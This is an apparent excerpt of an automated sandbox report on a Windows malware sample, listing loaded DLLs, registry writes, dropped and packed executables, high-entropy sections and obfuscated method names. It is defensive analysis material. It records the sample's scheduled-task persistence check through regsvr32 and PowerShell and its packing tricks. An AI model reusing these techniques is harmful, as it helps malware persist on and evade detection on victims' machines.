                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: coreuicomponents.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: shfolder.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: rstrtmgr.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: dwmapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: explorerframe.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: sfc.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: sfc_os.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpWindow found: window name: TMainForm
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Flv to AVI Converter_is1Jump to behavior
                            Source: AApUa7VQiy.exeStatic file information: File size 1850880 > 1048576
                            Source: AApUa7VQiy.exeStatic PE information: Raw size of litpxdqa is bigger than: 0x100000 < 0x197200
                            Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: f46bdbcca4.tmp, 00000020.00000003.2055762114.00000000034D8000.00000004.00001000.00020000.00000000.sdmp, f46bdbcca4.tmp, 00000020.00000003.2051282895.00000000031A0000.00000004.00001000.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeUnpacked PE file: 3.2.ES0PERDCSSGNQK1XTMK282189FFMR8.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzipjhra:EW;iworeitq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzipjhra:EW;iworeitq:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeUnpacked PE file: 6.2.BEB973FPO2R62ZWABVOVP8TC.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 7.2.skotes.exe.20000.0.unpack :EW;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 8.2.skotes.exe.20000.0.unpack :EW;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 9.2.skotes.exe.20000.0.unpack :EW;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeUnpacked PE file: 12.2.flv2aviconverter24.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeUnpacked PE file: 15.2.ktIplF5.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mzomafvq:EW;rxmgvynz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mzomafvq:EW;rxmgvynz:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeUnpacked PE file: 30.2.df1b740bf8.exe.230000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jxlmjtji:EW;pjewfnhk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jxlmjtji:EW;pjewfnhk:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeUnpacked PE file: 12.2.flv2aviconverter24.exe.400000.0.unpack
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                            Source: random[2].exe2.9.drStatic PE information: 0xB9EE827D [Tue Nov 6 08:25:33 2068 UTC]
                            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                            Source: is-PJU74.tmp.11.drStatic PE information: real checksum: 0x0 should be: 0x1b9553
                            Source: random[2].exe0.9.drStatic PE information: real checksum: 0x1bc4aa should be: 0x1c46c8
                            Source: infinity.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x394f14
                            Source: ktIplF5.exe.9.drStatic PE information: real checksum: 0x1dac20 should be: 0x1daeb9
                            Source: 513076b4b2.exe.9.drStatic PE information: real checksum: 0x1bc4aa should be: 0x1c46c8
                            Source: _setup64.tmp.32.drStatic PE information: real checksum: 0x0 should be: 0x8546
                            Source: 62950fb3a8.exe.9.drStatic PE information: real checksum: 0x6375a6 should be: 0x637c28
                            Source: random[4].exe.9.drStatic PE information: real checksum: 0x1d0dd0 should be: 0x1cca80
                            Source: d37c6a3c82.exe.9.drStatic PE information: real checksum: 0x1daff3 should be: 0x1e47c9
                            Source: random[2].exe1.9.drStatic PE information: real checksum: 0xdfde2 should be: 0xd54e7
                            Source: ktIplF5[1].exe.9.drStatic PE information: real checksum: 0x1dac20 should be: 0x1daeb9
                            Source: AApUa7VQiy.exeStatic PE information: real checksum: 0x1cccf4 should be: 0x1c7af4
                            Source: f46bdbcca4.tmp.33.drStatic PE information: real checksum: 0x0 should be: 0x122532
                            Source: is-TBCD3.tmp.11.drStatic PE information: real checksum: 0x0 should be: 0x14980c
                            Source: infinity[1].exe.9.drStatic PE information: real checksum: 0x0 should be: 0x394f14
                            Source: random[1].exe0.9.drStatic PE information: real checksum: 0xfd7f5 should be: 0xfdb14
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: real checksum: 0x2e8a3c should be: 0x2f1b0b
                            Source: random[3].exe1.9.drStatic PE information: real checksum: 0xf210b should be: 0xb526d
                            Source: _iscrypt.dll.11.drStatic PE information: real checksum: 0x0 should be: 0x89d2
                            Source: 61f0c6628c.exe.9.drStatic PE information: real checksum: 0xdfde2 should be: 0xd54e7
                            Source: df1b740bf8.exe.9.drStatic PE information: real checksum: 0x1da53e should be: 0x1d2bf2
                            Source: is-2E87P.tmp.11.drStatic PE information: real checksum: 0x0 should be: 0xb1202
                            Source: is-0DEO7.tmp.34.drStatic PE information: real checksum: 0x0 should be: 0x1308eb
                            Source: random[1].exe1.9.drStatic PE information: real checksum: 0x1da53e should be: 0x1d2bf2
                            Source: infinity.tmp.10.drStatic PE information: real checksum: 0x0 should be: 0xb6f3c
                            Source: 6299d9e5a5.exe.9.drStatic PE information: real checksum: 0xf210b should be: 0xb526d
                            Source: f46bdbcca4.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x16fc42
                            Source: _setup64.tmp.34.drStatic PE information: real checksum: 0x0 should be: 0x8546
                            Source: skotes.exe.6.drStatic PE information: real checksum: 0x2e8a3c should be: 0x2f1b0b
                            Source: a6c5834e2f.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x3a0195
                            Source: _isdecmp.dll.32.drStatic PE information: real checksum: 0x0 should be: 0x5528
                            Source: random[3].exe0.9.drStatic PE information: real checksum: 0x1daff3 should be: 0x1e47c9
                            Source: 179187318e.exe.9.drStatic PE information: real checksum: 0xfd7f5 should be: 0xfdb14
                            Source: random[2].exe.9.drStatic PE information: real checksum: 0x6375a6 should be: 0x637c28
                            Source: f46bdbcca4.tmp.31.drStatic PE information: real checksum: 0x0 should be: 0x122532
                            Source: _isdecmp.dll.34.drStatic PE information: real checksum: 0x0 should be: 0x5528
                            Source: random[1].exe2.9.drStatic PE information: real checksum: 0x0 should be: 0x16fc42
                            Source: random[1].exe.9.drStatic PE information: real checksum: 0x0 should be: 0x3a0195
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: real checksum: 0x1bc4aa should be: 0x1c46c8
                            Source: 072d564b60.exe.9.drStatic PE information: real checksum: 0x1d0dd0 should be: 0x1cca80
                            Source: is-M72JG.tmp.34.drStatic PE information: real checksum: 0x319701 should be: 0x30ff91
                            Source: AApUa7VQiy.exeStatic PE information: section name:
                            Source: AApUa7VQiy.exeStatic PE information: section name: .idata
                            Source: AApUa7VQiy.exeStatic PE information: section name:
                            Source: AApUa7VQiy.exeStatic PE information: section name: litpxdqa
                            Source: AApUa7VQiy.exeStatic PE information: section name: jzjfpldr
                            Source: AApUa7VQiy.exeStatic PE information: section name: .taggant
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: section name:
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: section name: .idata
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: section name:
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: section name: bzipjhra
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: section name: iworeitq
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: section name: .taggant
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: section name:
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: section name: .idata
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: section name: fwrotwuw
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: section name: wyiambmx
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: section name: .taggant
                            Source: skotes.exe.6.drStatic PE information: section name:
                            Source: skotes.exe.6.drStatic PE information: section name: .idata
                            Source: skotes.exe.6.drStatic PE information: section name: fwrotwuw
                            Source: skotes.exe.6.drStatic PE information: section name: wyiambmx
                            Source: skotes.exe.6.drStatic PE information: section name: .taggant
                            Source: random[2].exe.9.drStatic PE information: section name:
                            Source: random[2].exe.9.drStatic PE information: section name: .idata
                            Source: random[2].exe.9.drStatic PE information: section name: stadzsnm
                            Source: random[2].exe.9.drStatic PE information: section name: tsmjrbki
                            Source: random[2].exe.9.drStatic PE information: section name: .taggant
                            Source: 62950fb3a8.exe.9.drStatic PE information: section name:
                            Source: 62950fb3a8.exe.9.drStatic PE information: section name: .idata
                            Source: 62950fb3a8.exe.9.drStatic PE information: section name: stadzsnm
                            Source: 62950fb3a8.exe.9.drStatic PE information: section name: tsmjrbki
                            Source: 62950fb3a8.exe.9.drStatic PE information: section name: .taggant
                            Source: random[4].exe.9.drStatic PE information: section name:
                            Source: random[4].exe.9.drStatic PE information: section name: .idata
                            Source: random[4].exe.9.drStatic PE information: section name:
                            Source: random[4].exe.9.drStatic PE information: section name: zqjesnms
                            Source: random[4].exe.9.drStatic PE information: section name: itcibofp
                            Source: random[4].exe.9.drStatic PE information: section name: .taggant
                            Source: 072d564b60.exe.9.drStatic PE information: section name:
                            Source: 072d564b60.exe.9.drStatic PE information: section name: .idata
                            Source: 072d564b60.exe.9.drStatic PE information: section name:
                            Source: 072d564b60.exe.9.drStatic PE information: section name: zqjesnms
                            Source: 072d564b60.exe.9.drStatic PE information: section name: itcibofp
                            Source: 072d564b60.exe.9.drStatic PE information: section name: .taggant
                            Source: random[3].exe0.9.drStatic PE information: section name:
                            Source: random[3].exe0.9.drStatic PE information: section name: .idata
                            Source: random[3].exe0.9.drStatic PE information: section name:
                            Source: random[3].exe0.9.drStatic PE information: section name: gopdotwy
                            Source: random[3].exe0.9.drStatic PE information: section name: wozfuuqk
                            Source: random[3].exe0.9.drStatic PE information: section name: .taggant
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name:
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name: .idata
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name:
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name: gopdotwy
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name: wozfuuqk
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name: .taggant
                            Source: random[2].exe0.9.drStatic PE information: section name:
                            Source: random[2].exe0.9.drStatic PE information: section name: .idata
                            Source: random[2].exe0.9.drStatic PE information: section name:
                            Source: random[2].exe0.9.drStatic PE information: section name: bzipjhra
                            Source: random[2].exe0.9.drStatic PE information: section name: iworeitq
                            Source: random[2].exe0.9.drStatic PE information: section name: .taggant
                            Source: 513076b4b2.exe.9.drStatic PE information: section name:
                            Source: 513076b4b2.exe.9.drStatic PE information: section name: .idata
                            Source: 513076b4b2.exe.9.drStatic PE information: section name:
                            Source: 513076b4b2.exe.9.drStatic PE information: section name: bzipjhra
                            Source: 513076b4b2.exe.9.drStatic PE information: section name: iworeitq
                            Source: 513076b4b2.exe.9.drStatic PE information: section name: .taggant
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name:
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name: .idata
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name:
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name: mzomafvq
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name: rxmgvynz
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name: .taggant
                            Source: ktIplF5.exe.9.drStatic PE information: section name:
                            Source: ktIplF5.exe.9.drStatic PE information: section name: .idata
                            Source: ktIplF5.exe.9.drStatic PE information: section name:
                            Source: ktIplF5.exe.9.drStatic PE information: section name: mzomafvq
                            Source: ktIplF5.exe.9.drStatic PE information: section name: rxmgvynz
                            Source: ktIplF5.exe.9.drStatic PE information: section name: .taggant
                            Source: random[1].exe1.9.drStatic PE information: section name:
                            Source: random[1].exe1.9.drStatic PE information: section name: .idata
                            Source: random[1].exe1.9.drStatic PE information: section name:
                            Source: random[1].exe1.9.drStatic PE information: section name: jxlmjtji
                            Source: random[1].exe1.9.drStatic PE information: section name: pjewfnhk
                            Source: random[1].exe1.9.drStatic PE information: section name: .taggant
                            Source: df1b740bf8.exe.9.drStatic PE information: section name:
                            Source: df1b740bf8.exe.9.drStatic PE information: section name: .idata
                            Source: df1b740bf8.exe.9.drStatic PE information: section name:
                            Source: df1b740bf8.exe.9.drStatic PE information: section name: jxlmjtji
                            Source: df1b740bf8.exe.9.drStatic PE information: section name: pjewfnhk
                            Source: df1b740bf8.exe.9.drStatic PE information: section name: .taggant
                            Source: is-B6V2L.tmp.11.drStatic PE information: section name: /4
                            Source: is-B6V2L.tmp.11.drStatic PE information: section name: /19
                            Source: is-B6V2L.tmp.11.drStatic PE information: section name: /35
                            Source: is-B6V2L.tmp.11.drStatic PE information: section name: /51
                            Source: is-B6V2L.tmp.11.drStatic PE information: section name: /63
                            Source: is-B6V2L.tmp.11.drStatic PE information: section name: /77
                            Source: is-B6V2L.tmp.11.drStatic PE information: section name: /89
                            Source: is-B6V2L.tmp.11.drStatic PE information: section name: /102
                            Source: is-B6V2L.tmp.11.drStatic PE information: section name: /113
                            Source: is-B6V2L.tmp.11.drStatic PE information: section name: /124
                            Source: sqlite3.dll.12.drStatic PE information: section name: /4
                            Source: sqlite3.dll.12.drStatic PE information: section name: /19
                            Source: sqlite3.dll.12.drStatic PE information: section name: /35
                            Source: sqlite3.dll.12.drStatic PE information: section name: /51
                            Source: sqlite3.dll.12.drStatic PE information: section name: /63
                            Source: sqlite3.dll.12.drStatic PE information: section name: /77
                            Source: sqlite3.dll.12.drStatic PE information: section name: /89
                            Source: sqlite3.dll.12.drStatic PE information: section name: /102
                            Source: sqlite3.dll.12.drStatic PE information: section name: /113
                            Source: sqlite3.dll.12.drStatic PE information: section name: /124
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: .xdata
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /4
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /19
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /35
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /47
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /61
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /73
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /86
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /97
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /113
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /127
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /143
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /159
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeCode function: 0_3_014AA5F4 pushad ; ret 0_3_014AA5F5
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeCode function: 0_3_014B0399 push ss; ret 0_3_014B039A
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeCode function: 0_3_0145C384 pushfd ; ret 0_3_0145C385
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B1D91C push ecx; ret 6_2_00B1D92F
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B11359 push es; ret 6_2_00B1135A
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_0003D91C push ecx; ret 7_2_0003D92F
                            Source: AApUa7VQiy.exeStatic PE information: section name: entropy: 7.979872824347602
                            Source: AApUa7VQiy.exeStatic PE information: section name: litpxdqa entropy: 7.95346190111974
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: section name: bzipjhra entropy: 7.95452541615898
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: section name: entropy: 7.981797773656524
                            Source: skotes.exe.6.drStatic PE information: section name: entropy: 7.981797773656524
                            Source: random[4].exe.9.drStatic PE information: section name: entropy: 7.98292861859206
                            Source: random[4].exe.9.drStatic PE information: section name: zqjesnms entropy: 7.952975372450472
                            Source: 072d564b60.exe.9.drStatic PE information: section name: entropy: 7.98292861859206
                            Source: 072d564b60.exe.9.drStatic PE information: section name: zqjesnms entropy: 7.952975372450472
                            Source: random[3].exe0.9.drStatic PE information: section name: entropy: 7.98364611125624
                            Source: random[3].exe0.9.drStatic PE information: section name: gopdotwy entropy: 7.953887577655385
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name: entropy: 7.98364611125624
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name: gopdotwy entropy: 7.953887577655385
                            Source: random[2].exe0.9.drStatic PE information: section name: bzipjhra entropy: 7.95452541615898
                            Source: 513076b4b2.exe.9.drStatic PE information: section name: bzipjhra entropy: 7.95452541615898
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name: entropy: 7.971954723173139
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name: mzomafvq entropy: 7.954155998647114
                            Source: ktIplF5.exe.9.drStatic PE information: section name: entropy: 7.971954723173139
                            Source: ktIplF5.exe.9.drStatic PE information: section name: mzomafvq entropy: 7.954155998647114
                            Source: random[1].exe1.9.drStatic PE information: section name: entropy: 7.976929850931208
                            Source: random[1].exe1.9.drStatic PE information: section name: jxlmjtji entropy: 7.953783368763905
                            Source: df1b740bf8.exe.9.drStatic PE information: section name: entropy: 7.976929850931208
                            Source: df1b740bf8.exe.9.drStatic PE information: section name: jxlmjtji entropy: 7.953783368763905
                            Source: is-F3L00.tmp.11.drStatic PE information: section name: .text entropy: 6.90903234258047
                            Source: random[2].exe2.9.dr, aNQaxxDiYjXg.csHigh entropy of concatenated method names: 'MsYIiHCKOVg', 'AEIcapmlYwreYrwbho', 'grtEQPnEWQeGyOSsVquAnysLp', 'pxnOSxlzAtLoJePZLWYzXO', 'IbsfQgxrfqgPuy', 'ztQvAnOyfhhCblhxUz', 'dxdlOMPOTTnPkakgWUGEGfztEkAq', 'OAifdjgfkNwmDDXqVnAD', 'TLJetgkhOgLr', 'drEVxryILBScHeTHJfUUrx'
                            Source: random[2].exe2.9.dr, uBQRQemRwragayxWIgNspKbnCcaXv.csHigh entropy of concatenated method names: 'IjUmeHhCBOyXrjvVvfONTPF', 'jPPhvaEdyPCFnNAkJlNs', 'BeQPfkZSpjPvYqqBenLtJZo', 'CYawTJzZuySnyVztOHTAHtpzd', 'JjaSPmSzbwZLvheEztVywB', 'AQYdCEVeAxZE', 'ahfneZThAlkikgxqxo', 'YMclrJgYWZTZSKJJSQaYw', 'vJnhTmqycRrvnmNN', 'bxqWmohFigqxoF'
                            Source: 4ee3234999.exe.9.dr, aNQaxxDiYjXg.csHigh entropy of concatenated method names: 'MsYIiHCKOVg', 'AEIcapmlYwreYrwbho', 'grtEQPnEWQeGyOSsVquAnysLp', 'pxnOSxlzAtLoJePZLWYzXO', 'IbsfQgxrfqgPuy', 'ztQvAnOyfhhCblhxUz', 'dxdlOMPOTTnPkakgWUGEGfztEkAq', 'OAifdjgfkNwmDDXqVnAD', 'TLJetgkhOgLr', 'drEVxryILBScHeTHJfUUrx'
